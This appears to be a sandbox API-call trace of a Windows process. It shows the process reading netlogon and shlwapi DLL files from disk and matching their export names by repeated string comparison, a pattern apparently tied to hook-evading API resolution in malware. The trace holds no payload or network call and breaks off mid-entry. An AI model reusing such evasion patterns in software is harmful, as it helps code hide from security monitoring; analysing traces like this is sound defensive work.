[0127.494] CloseHandle (hObject=0x17c) returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0127.494] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0127.495] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0127.496] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0127.497] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0127.689] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0127.689] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0127.689] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0127.689] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0127.689] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0127.689] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0127.689] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0127.689] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0127.690] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0127.691] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0127.692] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0127.692] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0127.693] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0127.694] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0127.695] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0127.695] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0127.696] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0127.696] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0127.696] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0127.696] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0127.696] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0127.696] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0127.700] GetProcessHeap () returned 0x590000 [0127.700] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x590000) returned 1 [0127.700] GetProcessHeap () returned 0x590000 [0127.700] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9180 [0127.700] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0127.701] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0127.701] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0127.701] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0127.701] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.701] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0127.702] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0127.702] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0127.702] GetProcessHeap () returned 0x590000 [0127.702] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x51148) returned 0x2d05030 [0127.702] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0127.702] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0127.708] CloseHandle (hObject=0x17c) returned 1 [0127.708] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0127.708] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0127.708] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0127.708] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0127.709] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0127.709] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0127.709] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0127.709] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0127.709] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0127.709] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0127.709] lstrcmpA 